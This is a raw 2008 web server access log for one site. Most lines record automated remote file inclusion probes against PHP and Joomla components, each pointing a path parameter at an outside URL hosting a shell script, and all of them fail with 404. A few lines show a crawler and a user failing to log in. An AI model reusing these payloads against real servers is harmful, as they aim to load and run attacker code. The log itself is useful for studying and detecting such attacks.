69.36.2.15 - - [26/Feb/2008:10:13:23 -0800] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.uwgnh.org//tsep/include/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.36.2.15 - - [26/Feb/2008:10:13:24 -0800] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.uwgnh.org//tsep/include/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.36.2.15 - - [26/Feb/2008:10:13:25 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.uwgnh.org//tsep/include/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.87.20.84 - - [26/Feb/2008:10:13:38 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://berkshiretradingpost.com/response.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
83.87.20.84 - - [26/Feb/2008:10:13:38 -0800] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://berkshiretradingpost.com/response.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
211.233.7.68 - - [26/Feb/2008:10:13:49 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
211.233.7.68 - - [26/Feb/2008:10:13:54 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
67.195.58.165 - - [26/Feb/2008:10:14:10 -0800] "GET /logs/access_080117.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.62.191.127 - - [26/Feb/2008:10:15:10 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.62.191.127 - - [26/Feb/2008:10:15:10 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.62.191.127 - - [26/Feb/2008:10:15:14 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:10:15:16 -0800] "GET /logs/access_080123.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:10:15:17 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:10:15:18 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.177.226.178 - - [26/Feb/2008:10:15:35 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.36.2.15 - - [26/Feb/2008:10:15:42 -0800] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.uwgnh.org//tsep/include/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.36.2.15 - - [26/Feb/2008:10:15:42 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.uwgnh.org//tsep/include/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.36.2.15 - - [26/Feb/2008:10:15:43 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.uwgnh.org//tsep/include/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.248.95 - - [26/Feb/2008:10:15:45 -0800] "GET /logs/access_080131.log/components/com_simpleboard/file_upload.php?sbp=http://www.hospdex.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:10:16:03 -0800] "GET /logs/access_080123.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:10:16:04 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [26/Feb/2008:10:16:04 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
80.237.144.235 - - [26/Feb/2008:10:16:13 -0800] "GET /logs/access_080108.log/config.inc.php?path_escape=http://www.serwis.wroc.pl/sorceid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [26/Feb/2008:10:16:18 -0800] "GET /config.inc.php?path_escape=http://www.serwis.wroc.pl/sorceid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [26/Feb/2008:10:16:21 -0800] "GET /logs/config.inc.php?path_escape=http://www.serwis.wroc.pl/sorceid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:17:11 -0800] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:17:11 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:17:12 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
213.186.126.68 - - [26/Feb/2008:10:17:30 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.36.2.15 - - [26/Feb/2008:10:17:54 -0800] "GET /logs/access_080126.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.uwgnh.org//tsep/include/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.135.109.228 - - [26/Feb/2008:10:18:22 -0800] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:10:19:57 -0800] "GET /plans/ HTTP/1.1" 200 1111 "http://www.st-owners.com/forums/showthread.php?t=36163" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:10:20:03 -0800] "GET / HTTP/1.1" 200 3094 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
85.144.41.191 - - [26/Feb/2008:10:20:07 -0800] "GET /logs/access_080126.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.144.41.191 - - [26/Feb/2008:10:20:08 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.144.41.191 - - [26/Feb/2008:10:20:08 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.144.41.191 - - [26/Feb/2008:10:20:10 -0800] "GET /logs/access_080131.log//components/com_performs/performs.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.144.41.191 - - [26/Feb/2008:10:20:11 -0800] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.144.41.191 - - [26/Feb/2008:10:20:11 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.144.41.191 - - [26/Feb/2008:10:20:12 -0800] "GET /logs/access_080120.log//components/com_performs/performs.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:10:20:14 -0800] "GET /plans/ HTTP/1.1" 200 1111 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:10:20:15 -0800] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
69.36.2.15 - - [26/Feb/2008:10:20:19 -0800] "GET /logs/access_080120.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.uwgnh.org//tsep/include/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.44.103 - - [26/Feb/2008:10:20:34 -0800] "GET /logs/access_080201.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:20:36 -0800] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
64.80.157.162 - sdgeorge@dmulk.com [26/Feb/2008:10:20:53 -0800] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:20:58 -0800] "GET /logs/access_080120.log/akocomments.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
64.80.157.162 - sdgeorge@dmulk.com [26/Feb/2008:10:21:26 -0800] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
213.193.222.218 - - [26/Feb/2008:10:21:40 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.72.184.250 - - [26/Feb/2008:10:22:04 -0800] "GET /logs//_theme/breadcrumb.php?rootBase=http://kiowa91.hostedwith.us/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
212.72.184.250 - - [26/Feb/2008:10:22:05 -0800] "GET //_theme/breadcrumb.php?rootBase=http://kiowa91.hostedwith.us/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
64.80.157.162 - sdgeorge@dmulk.com [26/Feb/2008:10:22:07 -0800] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:10:22:25 -0800] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - sdgeorge@dmulk.com [26/Feb/2008:10:22:25 -0800] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
67.195.44.102 - - [26/Feb/2008:10:22:29 -0800] "GET /logs/access_080117.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.29.152.248 - - [26/Feb/2008:10:22:41 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
64.80.157.162 - sdgeorge@dmulk.com [26/Feb/2008:10:22:44 -0800] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
85.144.41.191 - - [26/Feb/2008:10:23:36 -0800] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:10:23:51 -0800] "GET /logs/access_080126.log//modules/xfsection/modify.php?dir_module=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:10:23:51 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.100.189.222 - - [26/Feb/2008:10:23:52 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.geocities.com/s3t4n_b4nd3l/idid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.149.90.29 - - [26/Feb/2008:10:23:55 -0800] "GET /logs/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
83.149.90.29 - - [26/Feb/2008:10:23:55 -0800] "GET /index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:10:23:57 -0800] "GET /plans/ HTTP/1.1" 200 1111 "http://www.st-owners.com/forums/showthread.php?t=36163" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:10:24:07 -0800] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - sdgeorge@dmulk.com [26/Feb/2008:10:24:08 -0800] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:24:16 -0800] "GET /logs/access_080131.log/index.php?pagina=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:24:17 -0800] "GET /index.php?pagina=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:10:24:17 -0800] "GET /logs/index.php?pagina=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.6.23.15 - - [26/Feb/2008:10:24:52 -0800] "GET /?M=D HTTP/1.0" 200 3078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.46.171.144 - - [26/Feb/2008:10:25:03 -0800] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.downloadblog.altervista.org/k0tw.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
67.195.58.170 - - [26/Feb/2008:10:25:14 -0800] "GET /logs/access_080211.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.135.109.228 - - [26/Feb/2008:10:25:24 -0800] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.255.3.68 - - [26/Feb/2008:10:27:09 -0800] "GET /logs/access_080122.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.35.158.180 - - [26/Feb/2008:10:27:19 -0800] "GET /logs/access_080118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:10:27:28 -0800] "GET /plans/ HTTP/1.1" 200 1111 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:10:27:29 -0800] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - sdgeorge@dmulk.com [26/Feb/2008:10:27:29 -0800] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - sdgeorge@dmulk.com [26/Feb/2008:10:27:46 -0800] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - "" [26/Feb/2008:10:27:47 -0800] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - "" [26/Feb/2008:10:27:48 -0800] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:10:27:56 -0800] "GET /plans/ HTTP/1.1" 200 1111 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:10:27:57 -0800] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:10:27:58 -0800] "GET /logs/access_080121.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:10:27:59 -0800] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:10:27:59 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.45.242.50 - - [26/Feb/2008:10:28:07 -0800] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
66.45.242.50 - - [26/Feb/2008:10:28:07 -0800] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
64.80.157.162 - sdgeorge@dmulk.com [26/Feb/2008:10:28:30 -0800] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.62.191.127 - - [26/Feb/2008:10:28:32 -0800] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.62.191.127 - - [26/Feb/2008:10:28:32 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.62.191.127 - - [26/Feb/2008:10:28:38 -0800] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.62.191.127 - - [26/Feb/2008:10:28:38 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.62.191.127 - - [26/Feb/2008:10:28:39 -0800] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.62.191.127 - - [26/Feb/2008:10:28:39 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.80.157.162 - sdgeorge@dmulk.com [26/Feb/2008:10:29:01 -0800] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:10:29:07 -0800] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:10:29:07 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:10:29:08 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jobarte.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:10:29:08 -0800] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:10:29:10 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:10:29:10 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:10:29:15 -0800] "GET /logs/access_080211.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [26/Feb/2008:10:29:15 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.44.101.82 - - [26/Feb/2008:10:29:21 -0800] "GET /logs/access.log/errors.php?error=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.44.101.82 - - [26/Feb/2008:10:29:21 -0800] "GET /errors.php?error=http://www.kitchen-counter-tops.net/mambots/editors/tmedit/lang/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
